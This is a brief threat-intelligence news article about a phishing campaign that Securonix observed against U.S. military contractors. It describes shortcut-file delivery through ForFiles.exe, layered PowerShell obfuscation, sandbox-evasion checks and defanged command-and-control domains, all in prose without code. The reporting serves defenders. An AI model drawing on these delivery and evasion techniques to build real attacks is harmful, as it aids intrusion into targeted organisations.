Go to listing page

Attackers Attempt to Infiltrate U.S. Military Contractors Via Phishing

Attackers Attempt to Infiltrate U.S. Military Contractors Via Phishing
Researchers have observed an attack campaign targeting numerous military contractors involved in weapon manufacturing. One of them is a supplier of F-35 Lightning II fighter aircraft components.

The attack campaign

Securonix spotted the highly targeted attacks and found that involved sending phishing emails to employees that led to multi-stage infection. The attack, moreover, involved various persistence and detection avoidance mechanisms.
  • The attack begins with a phishing email with ZIP attachments laden with shortcut files. This file connects to the C2 and executes a chain of PowerShell scripts to infect the system with malware.
  • The shortcut file does not use commonly abused ‘cmd[.]exe’ or ‘powershell[.]exe’ tools. Instead, it uses an unusual ‘C:\Windows\System32\ForFiles[.]exe command to run commands.

Moreover, researchers could trace similarities between the ongoing campaign with APT37’s (Konni) previous attack campaigns, but couldn’t link the campaign to any known threat group with confidence.

Obfuscation and avoiding sandboxes

The campaign uses secure C2 infrastructure and multiple layers of obfuscation into PowerShell stagers. 
  • The obfuscation techniques include IEX obfuscation, reordering/symbol obfuscation, raw compression, byte value obfuscation, backtick obfuscation, reordering, and string replacement.
  • Further, to avoid sandboxes, a script is used to scan a list of processes associated with monitoring/debugging software and checks screen height is above 777 pixels and the memory is above 4GB.

Used domains

The domains used for the C2 infrastructure were registered in July and hosted on DigitalOcean.
  • Later, the attackers shifted their domains to Cloudflare to take advantage of CDN and security services, such as geoblocking, IP address masking, and TLS/HTTPS encryption.
  • Some of the C2 domains include terma[.]wiki, terma[.]dev, terma[.]ink, and terma[.]app.

Conclusion

The recent campaign seems to be operated by a sophisticated threat actor who is well-versed with the tricks of staying hidden. Organizations are suggested to stay vigilant and aware of the used techniques. Further, it is suggested to adopt a collaborative, threat intelligence sharing-based security posture to stay protected from such threats.
Cyware Publisher

Publisher

Cyware